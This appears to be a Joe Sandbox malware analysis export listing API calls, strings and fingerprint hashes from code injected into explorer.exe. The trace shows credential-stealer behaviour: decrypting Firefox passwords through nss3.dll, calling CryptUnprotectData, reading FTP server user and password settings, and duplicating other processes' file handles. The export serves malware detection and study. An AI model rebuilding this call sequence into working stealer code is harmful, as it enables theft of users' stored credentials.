                                                                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                                                                                              • Opcode ID: c96bbe3d4ed111b4c44a647a69504615f4ae5d1570b7f8fc7822c1804e7d5412
                                                                                                                                                                                                              • Instruction ID: 54ffd58e55c30cd72a83b9ec0bffef9294ff085e13a58fba200275fcd0e5272f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c96bbe3d4ed111b4c44a647a69504615f4ae5d1570b7f8fc7822c1804e7d5412
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8D01771693731A2EDB566397C0CEA76E1DDF06ABDB444A14B41DD91C0E32488A782F0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                              • Opcode ID: b1cf815c875cceb589a5bb45341715a37f1c0f0075b18fd6a9e686507f96effc
                                                                                                                                                                                                              • Instruction ID: 0ac5da1f9ad65d139b9bdf11e206b9dde6c19a2ee3ad60db97adc625ae1b37aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1cf815c875cceb589a5bb45341715a37f1c0f0075b18fd6a9e686507f96effc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9A00275D90104DBDD4557A49A0DA1E351DF758702F10894471458A041D97454148731
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000018), ref: 027912B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryZero
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 816449071-0
                                                                                                                                                                                                              • Opcode ID: e33a84685c145de7ee79c91db66a6931358cf1ef847d12dcec8259c733f4eea6
                                                                                                                                                                                                              • Instruction ID: 01effb7f7e78657b49294d6d5bf9a6e98000e86e007dc824731db64039fc5711
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e33a84685c145de7ee79c91db66a6931358cf1ef847d12dcec8259c733f4eea6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8111F8B5F01209AFDF10DFA5E984AAEB7BCEB08251B508429F949E7240D730D910CB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,02792C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02791BAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: 133034c9f559f8d9c215b248bcfb8b8157e107be7312618815f47781fe2c195c
                                                                                                                                                                                                              • Instruction ID: 1abf5b0de9c1b02184c27f4444439157fa684e786c210434b02e6fe888626874
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 133034c9f559f8d9c215b248bcfb8b8157e107be7312618815f47781fe2c195c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAD0A933E0263282DE64563C3804892A2816A0057839A07B4FC2AF70C0E324CCA282D0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02791684
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2244384528-0
                                                                                                                                                                                                              • Opcode ID: d1f605da9b6381f220f1a81e72eb8e441f23255b9cc9304772a9715d6e571011
                                                                                                                                                                                                              • Instruction ID: 539e1364d2f9b0ee8a94d73e71b60f7a82a6d679f76e244c0cc041300381efe7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1f605da9b6381f220f1a81e72eb8e441f23255b9cc9304772a9715d6e571011
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8C08C30960232DFEB301A309C09B8636D8AF19BB2F060D69E0C5DD0C0E6F408D0CAA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0279158A), ref: 02791056
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: d65c782b5174beb32231dbc689612d7d9af877553c0b1165147673032a5d030d
                                                                                                                                                                                                              • Instruction ID: 6037aa996cd3f040cc40e376d455c03bfbc7d9fce9ff793625b3f83d7c0d8b7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d65c782b5174beb32231dbc689612d7d9af877553c0b1165147673032a5d030d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17A001B0BD5210AAFD696762AE1BF2529289754B12F104644B3096C0C055E475108529
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,02794A5B,?,?,00000000,?,?,?,?,02794B66,?), ref: 02791065
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                              • Opcode ID: 988fe7615a082dfecee929cca8129c342e9809c27dbe3c4ebe0cdded5fb63623
                                                                                                                                                                                                              • Instruction ID: 21863d8d9542dbad3cbc080d8d1ef91ba2641921634ef59fa0a3f5716983fba8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 988fe7615a082dfecee929cca8129c342e9809c27dbe3c4ebe0cdded5fb63623
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CA00270ED0700A6EDB557205D0AF0526186754B11F2089447241AD0C159B5E0548A28
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 027934C0
                                                                                                                                                                                                                • Part of subcall function 027933C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02793401
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,027937A8), ref: 027934E9
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0279351E
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02793541
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02793586
                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0279358F
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,File), ref: 027935B6
                                                                                                                                                                                                              • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 027935DE
                                                                                                                                                                                                              • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 027935F6
                                                                                                                                                                                                              • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02793606
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0279361E
                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 02793631
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02793658
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0279366B
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02793681
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 027936AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 027936C0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,027937A8), ref: 027936F5
                                                                                                                                                                                                                • Part of subcall function 02791C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02791CC0
                                                                                                                                                                                                                • Part of subcall function 02791C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02791CDA
                                                                                                                                                                                                                • Part of subcall function 02791C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02791CE6
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,027937A8), ref: 02793707
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                                                                                              • String ID: File
                                                                                                                                                                                                              • API String ID: 3915112439-749574446
                                                                                                                                                                                                              • Opcode ID: 0de35bf41a9a32ff120b23a1a0d1e9564c67cbff54fb266e12399a3f06d1a807
                                                                                                                                                                                                              • Instruction ID: 47f8bbb1e725e96948991f24e53203f92045019d7e59c3f788c62963299dfd43
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0de35bf41a9a32ff120b23a1a0d1e9564c67cbff54fb266e12399a3f06d1a807
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6618070644301AFDB219F24EC88F2B7BFDEB88764F00492CF946AA291D775D9648F61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 027E4502
                                                                                                                                                                                                              • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 027E475F
                                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 027E4803
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                              • API String ID: 231171946-1096842476
                                                                                                                                                                                                              • Opcode ID: 8d97d3d05a70c7f8bc6cfce19c5b9dc243f39c3a2be40932de641d72787e928a
                                                                                                                                                                                                              • Instruction ID: 0ce59f5cb3ab5a5b0e06afa1db8abf6e4eac45fe2d46ef62cf3601f43b0ae350
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d97d3d05a70c7f8bc6cfce19c5b9dc243f39c3a2be40932de641d72787e928a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC1E2B0A083929BDF35CE1884A577BB7E2AF8E318F04052EE4D797251D734D445CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02796AAA: memset.NTDLL ref: 02796AC5
                                                                                                                                                                                                              • memset.NTDLL ref: 027B5F53
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                                                                                              • API String ID: 2221118986-594550510
                                                                                                                                                                                                              • Opcode ID: aa3389a1fceff8e1a53326f1a1daa59f805575176a76b46b6973c2b4eaea1e4a
                                                                                                                                                                                                              • Instruction ID: fd5c409f3617db0980aa4b5fda0eb21d442d59d1366b4a7b37314255ba6fecaf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa3389a1fceff8e1a53326f1a1daa59f805575176a76b46b6973c2b4eaea1e4a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06C19B70A04702AFDB16DF25C484BABB7E6BF88714F04892DF94597241E731D952CF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 02792127
                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0279213A
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0279214F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                                                                                              • String ID: %li
                                                                                                                                                                                                              • API String ID: 4120667308-1021419598
                                                                                                                                                                                                              • Opcode ID: 48b15935bf713c44c6beb6b4339177e3f643802399795ea840dcd565ca694880
                                                                                                                                                                                                              • Instruction ID: e98b72ac5d42c609a0c4df9050ba8f7f2ae1997e272e659e44ea58933286994d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48b15935bf713c44c6beb6b4339177e3f643802399795ea840dcd565ca694880
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52E09232A4021877DB223BA89C0AEAE7B6DDB44A15F404595FA05F6141E9724A3487E5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02793E4B,00000000), ref: 0279124A
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791268
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791295
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 117552131-0
                                                                                                                                                                                                              • Opcode ID: c4255cfb7c79da56695641141accf74ac1f9ff79a23a2e15c82f2410be98fefe
                                                                                                                                                                                                              • Instruction ID: 96b897f86dbebbae15b7839dcf6e04b6eeb74527a93b8f3b171252187765fb74
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4255cfb7c79da56695641141accf74ac1f9ff79a23a2e15c82f2410be98fefe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B001A2B1600316AFEB18CF15DC89FBBB7ACEB84655F00462EF505C6240EBB1DC018A70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,027946E3), ref: 027911ED
                                                                                                                                                                                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0279120F
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02791231
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 117552131-0
                                                                                                                                                                                                              • Opcode ID: a16179d529a2e13d1e6bac25dc7f3a074367cb0e8030e6dd01fd4337d2f9d972
                                                                                                                                                                                                              • Instruction ID: 85fdf23facad226bb7d276cbd5d9d06a9895afd7cd4bcb9e9167a2ef1565de48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a16179d529a2e13d1e6bac25dc7f3a074367cb0e8030e6dd01fd4337d2f9d972
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EF0F67270430E7BE6109E46EC80FA77B9DDF95694F10002EB601C6140DEA2ED0586B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02791FFA
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 02792015
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2807545630-0
                                                                                                                                                                                                              • Opcode ID: ae9ff05315d8ade9847e3319bc3c04343c34b4526081e1f503d8fffd9a419cc3
                                                                                                                                                                                                              • Instruction ID: 2c76156a9972b5fe4bde896e9c230b90b267978f4f8b9cfcee35eeaec3ebb897
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae9ff05315d8ade9847e3319bc3c04343c34b4526081e1f503d8fffd9a419cc3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66012171A01219BB9B15DF99E884DAFBBBCEF15250B10446AF905D3201D7719A10CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 027911B2
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 027911D2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3825993179-0
                                                                                                                                                                                                              • Opcode ID: 1f8c25583a226fa0fad1a61dceef42781d1ba45aa287c1012b79d6753cc99a94
                                                                                                                                                                                                              • Instruction ID: 8fce9695a0b2c49de8bf25b262cafb91d0e162197fd34508d6ebabc207ed38a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f8c25583a226fa0fad1a61dceef42781d1ba45aa287c1012b79d6753cc99a94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF02736600219B7CB20C59BDC88DEBFB6DCF856B0B00016AF90CD7100DA728D10C7B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.COMBASE(027E62B0,00000000,00000001,027E62A0,?), ref: 0279445F
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 027944AA
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0279456E
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Servers,?), ref: 0279457D
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Settings,?), ref: 0279458C
                                                                                                                                                                                                                • Part of subcall function 027911E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,027946E3), ref: 027911ED
                                                                                                                                                                                                                • Part of subcall function 027911E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0279120F
                                                                                                                                                                                                                • Part of subcall function 027911E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02791231
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Server,?), ref: 027945BE
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(LastServer,?), ref: 027945CD
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Host,?), ref: 02794657
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Port,?), ref: 02794679
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(User,?), ref: 0279469F
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Pass,?), ref: 027946C5
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0279471E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                                                                                              • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                                                                                              • API String ID: 2230072276-1234691226
                                                                                                                                                                                                              • Opcode ID: faa966de6d4fdc856dfc3a2f6977ef69c15fa712f0d6c2dfddef46dec15c4a66
                                                                                                                                                                                                              • Instruction ID: 1d19dc73dd19d780b9020a17fc2f2653e8391cd3011d585d1f8d2b4b5aae116c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: faa966de6d4fdc856dfc3a2f6977ef69c15fa712f0d6c2dfddef46dec15c4a66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCB10971204306AFDB00DF64D894E6A77F9EFC9759F00895CF6558B260DB72E806CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                                • Part of subcall function 02791090: lstrlenW.KERNEL32(?,?,00000000,027917E5), ref: 02791097
                                                                                                                                                                                                                • Part of subcall function 02791090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 027910A8
                                                                                                                                                                                                                • Part of subcall function 027919B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02792CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027919C4
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02792503
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0279250A
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 02792563
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 02792570
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02792591
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0279259E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 027925AB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 027925B8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 027925C5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 027925D2
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 027925DF
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrlen.KERNEL32(?,?,?,?,00000000,02792783), ref: 0279192B
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02792783), ref: 02791930
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,?), ref: 02791946
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,00000000), ref: 0279194A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                                                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                                                                                              • API String ID: 3366569387-3272982511
